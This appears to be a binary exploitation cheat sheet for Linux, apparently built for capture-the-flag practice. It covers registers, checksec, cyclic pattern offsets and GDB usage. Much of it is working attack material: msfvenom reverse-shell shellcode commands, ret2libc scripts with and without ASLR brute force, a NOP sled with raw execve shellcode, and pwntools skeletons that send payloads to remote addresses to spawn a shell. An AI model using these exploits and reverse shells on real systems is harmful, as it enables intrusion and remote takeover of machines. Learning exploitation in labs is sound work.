Binary Exploitation

Linux

Very Basic

# -----------| General Purpose Registers (32bit)
EAX        # Arithmetic and Logical Instructions
EBX        # Base Pointer for Memory Addresses
ECX        # Loop, Shift, Rotation Counter
EDX        # I/O Port Addressing, Multiplication, Division
ESI        # Pointer of data and source in string copy operations  (Source Index)  
EDI        # Pointer of data and destination in string copy operations  (Destination Index)

# -----------| Stack (32bit)
ESP        # The Stack Pointer (points to the top of the stack)
EBP        # The Base Pointer (frame base)
EIP        # The Instruction Pointer (tells what executes next!!)
  • Create shell code

# -----------| Windows
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c 
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -e x86/shikata_ga_nai  -b "\x00\x0a\x0d\x25\x26...BAD_CHARS"    

# -----------| Linux
msfvenom -p linux/x86/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c -b "\x00"     

00. Basic Checks

# -----------| CPU architecture information 
lscpu 

# -----------| x86-64 system call numbers
cat /usr/include/x86_64-linux-gnu/asm/unistd_64.h

# -----------| checksec info
checksec <FileName>
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled            <-- we can't drop shellcode on the stack and jump to it; so use return to libc
    PIE:      No PIE (0x8048000)
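Where the checksec columns above come from, as an added Python 3 example (not the page's or checksec's code): NX is the X bit of the PT_GNU_STACK program header, PIE is e_type == ET_DYN, and RELRO is the presence of PT_GNU_RELRO (Full RELRO would also need DT_BIND_NOW, which this reader does not parse). make_elf only builds constructed header-only test images; the real check runs on a file path.

```python
import struct
import sys

PT_GNU_STACK, PT_GNU_RELRO, PF_X, ET_DYN = 0x6474E551, 0x6474E552, 0x1, 3

def elf_hardening(data: bytes) -> dict:
    """Read the ELF header and program headers and report NX, PIE and RELRO like checksec."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = data[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    e = "<" if data[5] == 1 else ">"         # EI_DATA: 1 = little-endian
    e_type = struct.unpack_from(e + "H", data, 16)[0]
    if is64:
        e_phoff = struct.unpack_from(e + "Q", data, 32)[0]
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 54)
    else:
        e_phoff = struct.unpack_from(e + "I", data, 28)[0]
        e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 42)
    nx, relro = False, "No RELRO"            # no PT_GNU_STACK at all: x86 kernels default to an executable stack
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        p_type = struct.unpack_from(e + "I", data, off)[0]
        p_flags = struct.unpack_from(e + "I", data, off + (4 if is64 else 24))[0]   # p_flags sits at +4 (ELF64) or +24 (ELF32)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)        # stack segment without the X bit -> NX enabled
        elif p_type == PT_GNU_RELRO:
            relro = "Partial RELRO"          # Full RELRO additionally needs DT_BIND_NOW in .dynamic (not parsed here)
    return {"arch": "amd64" if is64 else "i386", "nx": nx, "pie": e_type == ET_DYN, "relro": relro}

def make_elf(is64: bool, e_type: int, phdrs: list) -> bytes:
    """Constructed test data: a minimal little-endian ELF image holding only the given (p_type, p_flags) headers."""
    ehsize, phentsize = (64, 56) if is64 else (52, 32)
    ident = b"\x7fELF" + bytes([2 if is64 else 1, 1, 1, 0]) + b"\0" * 8
    # fields: e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    if is64:
        hdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 62, 1, 0, ehsize, 0, 0, ehsize, phentsize, len(phdrs), 64, 0, 0)
        body = b"".join(struct.pack("<IIQQQQQQ", t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    else:
        hdr = ident + struct.pack("<HHIIIIIHHHHHH", e_type, 3, 1, 0, ehsize, 0, 0, ehsize, phentsize, len(phdrs), 40, 0, 0)
        body = b"".join(struct.pack("<IIIIIIII", t, 0, 0, 0, 0, 0, f, 0) for t, f in phdrs)
    return hdr + body

if __name__ == "__main__":
    # usage: python3 elf_hardening.py <FileName>
    with open(sys.argv[1], "rb") as fh:
        print(elf_hardening(fh.read()))
```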

# -----------| Disable ASLR (Address Space Layout Randomization)
echo 0 > /proc/sys/kernel/randomize_va_space

# -----------| Create pattern 
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200

# -----------| Check offset value
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <EIP_VALUE>
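How pattern_create.rb and pattern_offset.rb arrive at the offset, as an added Python 3 re-implementation (not the page's code and not Metasploit's): the pattern is the triplet sequence Aa0Aa1...Aa9Ab0..., unique in every 4-byte window for 20280 characters, and the crashed 32-bit register value is the little-endian reading of 4 consecutive pattern bytes.

```python
import string
import struct

def pattern_create(length: int) -> str:
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0... (repeats only after 20280 chars)."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]

def pattern_offset(query, length: int = 20280) -> int:
    """Offset of the crash value in the pattern, or -1 if it did not come from the pattern.
    query is the register value as an int (e.g. 0x33614132, i.e. the bytes '2Aa3' read
    little-endian) or the 4 pattern characters themselves."""
    if isinstance(query, int):
        query = struct.pack("<I", query).decode("ascii", errors="replace")
    return pattern_create(length).find(query)
```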
  • Get all functions

readelf -s BasicOne | grep FUNC

01. ret2libc (NX enabled)

# -----------| Check ASLR changing ?
for i in {1..20}; do ldd <FileName> | grep libc; done
  • Return to libc [ ASLR OFF ]

import struct
import sys

# pwndbg + create cyclic + find offset 
junk = b"A" * 52

# ldd <FileName> | grep libc <-- find the libc base
libc = 0xb7e19000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x0003ada0)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- return address for system(); it does not really matter
exit = struct.pack('<I', libc + 0x000b07c8)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh = struct.pack('<I', libc + 0x0015ba0b)

# saved EIP -> system, system's return address -> exit, system's argument -> "/bin/sh"
payload = junk + system + exit + binsh
sys.stdout.buffer.write(payload)   # raw bytes (Python 3); print() would mangle them
  • Return to libc [ ASLR ON (Bruteforce) ]

from subprocess import call
import struct

# pwndbg + create cyclic + find offset 
junk = b"A" * 112

# ldd <FileName> | grep libc <-- libc base seen in one run; with ASLR on it changes every
# run, so the same payload is retried until the guess happens to match
libc = 0xb75b8000

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system@@GLI
system = struct.pack('<I', libc + 0x00040310)

# readelf -s /lib/i386-linux-gnu/libc.so.6 | grep _exit@@GLIBC <-- it does not really matter
exit = struct.pack('<I', libc + 0x00033290)

# strings -atx /lib/i386-linux-gnu/libc.so.6 | grep 'bin/sh'
binsh = struct.pack('<I', libc + 0x00162bac)

buff = junk
buff += system
buff += exit
buff += binsh

for i in range(513):
    print("Trying: %s" % i)
    ret = call(["/program/file/path", buff])   # bytes argv entries are accepted on POSIX

02. NOP sled (NX disabled)

## ------------------| x86 Bit
import sys

BUF_SIZE = 362

# 28-byte execve("/bin//sh") shellcode followed by exit()
SHELL_CODE  = b"\x31\xc0\x50\x68\x2f\x2f\x73"
SHELL_CODE += b"\x68\x68\x2f\x62\x69\x6e\x89"
SHELL_CODE += b"\xe3\x89\xc1\x89\xc2\xb0\x0b"
SHELL_CODE += b"\xcd\x80\x31\xc0\x40\xcd\x80"
EIP = b"????" ## replace with an address inside the NOP sled, little-endian: 0xbffff4c0 --> b"\xc0\xf4\xff\xbf"

# NOPs pad the buffer so sled + shellcode exactly fill it; EIP then lands on the saved return address
NOP_SLED = b"\x90" * (BUF_SIZE - len(SHELL_CODE))

payload = NOP_SLED + SHELL_CODE + EIP
sys.stdout.buffer.write(payload)   # raw bytes (Python 3)

03. PWNtool Skeletons

  • ret2libc (32 bit)

#!/usr/bin/python3
from pwn import *

context(terminal=['tmux','new-window'])
#context(os='linux', arch='i386')

# If program in local mode
#program = gdb.debug('./myapp','b main')

# If program in remote mode
program = remote('10.10.10.61',32812)

junk = b"A" * 212

# run gdb once, then CTRL+C to break into the debugger and type: p system
system = p32(0xf7e4c060)

# type p exit on gdb
exit = p32(0xf7e3faf0)
 
# type find &system,+9999999,"sh" on gdb
# select one and then type x/s 0xf7f6ddd5 to confirm it; that address goes here
binsh = p32(0xf7f6ddd5)

#program.recvuntil('What do you want me to echo back?')
program.recvuntil('Enter Bridge Access Code:')
program.sendline("Something")
program.sendline(junk + system + exit + binsh)

program.interactive()

  • ROP chain (64 bit)

from pwn import *

#context(terminal=['tmux','new-window'])
context(os='linux', arch='amd64')

# Load program in local mode
#program = gdb.debug('./myapp','b main')

# Load program in remote mode
program = remote('10.10.10.147',1337)

junk = b"A" * 112
bin_sh = b"/bin/sh\x00"
system = p64(0x40116e)
pop_r13 = p64(0x401206)
null = p64(0x0)
test = p64(0x401152)

#program.recvuntil('What do you want me to echo back?')
program.sendline(junk + bin_sh + pop_r13 + system + null + null + test)
program.interactive()

04. GDB

  • GDB-gef

# -----------| load program
gdb-gef ./myapp

# -----------| Run program
run
r

# -----------| Create pattern
pattern create 200

# -----------| Search RSP or EIP
pattern search $rsp
pattern search $eip
pattern search qaaa
pattern search 0x00007fffffffe288

# -----------| Show registers
registers
  • GDB-Peda

# -----------| load program
gdb-peda ./myapp

# -----------| Run program
run
r

# -----------| Get memory address of system (!! run the program before getting this)
p system

# -----------| Get memory address of /bin/sh; the value is inside libc (!! run the program before getting this)
searchmem /bin/sh

# -----------| Get memory address of exit
p exit

05. OBJDump

objdump -D myapp | grep system   